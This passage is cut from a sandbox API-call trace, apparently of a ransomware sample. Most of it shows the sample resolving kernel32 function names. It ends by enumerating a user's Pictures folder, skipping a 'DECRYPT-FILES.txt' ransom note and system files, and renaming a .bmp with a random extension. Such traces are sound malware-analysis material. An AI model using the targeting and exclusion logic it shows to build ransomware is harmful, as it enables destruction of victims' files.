returned="CreateFileW" [0086.969] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.969] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.969] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.969] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.969] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.969] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.969] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.969] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.969] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.969] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.969] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.969] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.969] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.970] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.970] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.970] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.970] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.970] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.970] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.970] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.970] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.970] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.970] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.970] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.970] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.970] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.970] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.970] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.970] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.970] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.970] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.970] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.971] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.971] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.971] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.971] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.971] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.971] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.971] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.971] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.971] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.971] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.971] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.971] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.971] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.971] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.971] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.971] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.971] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.971] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.971] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.972] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.972] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.972] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.972] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.972] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.972] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.972] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.972] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.972] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.972] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.972] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.972] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.972] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.972] lstrlenA (lpString="DELETEATOM") returned 10 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.972] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.972] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.972] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.972] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.973] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.973] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.973] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.973] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.973] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.973] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.973] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.973] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.973] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.973] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.973] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.973] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.973] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.973] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.973] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.973] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.973] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.973] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.973] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.974] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.974] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.974] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.974] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.974] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.974] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.974] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.974] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.974] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.974] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.974] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.974] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.974] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.974] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.974] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.974] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.974] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.975] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.975] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp") returned 68 [0086.975] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp.I1562Qs") returned 76 [0086.975] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\umdnbjx9-cegq.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp.I1562Qs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\umdnbjx9-cegq.bmp.i1562qs"), dwFlags=0x0) returned 1 [0086.975] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.976] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.976] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.976] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83592950, ftCreationTime.dwHighDateTime=0x1d4cbfd, ftLastAccessTime.dwLowDateTime=0x8289450, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0x8289450, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xee08, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT-SH4cQR9b.gif", cAlternateFileName="UT-SH4~1.GIF")) returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="autorun.inf") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="boot.ini") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="desktop.ini") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="ntuser.dat") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="iconcache.db") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="bootsect.bak") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="ntuser.dat.log") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="thumbs.db") returned 1 [0086.976] lstrcmpiW (lpString1="UT-SH4cQR9b.gif", lpString2="Bootfont.bin") returned 1 [0086.976] lstrlenW (lpString="UT-SH4cQR9b.gif") returned 15 [0086.977] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.977] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.977] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.977] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.977] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.977] lstrlenW (lpString="UT-SH4cQR9b.gif") returned 15 [0086.977] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.977] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="UT-SH4cQR9b.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif" [0086.977] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.977] CreateFileW 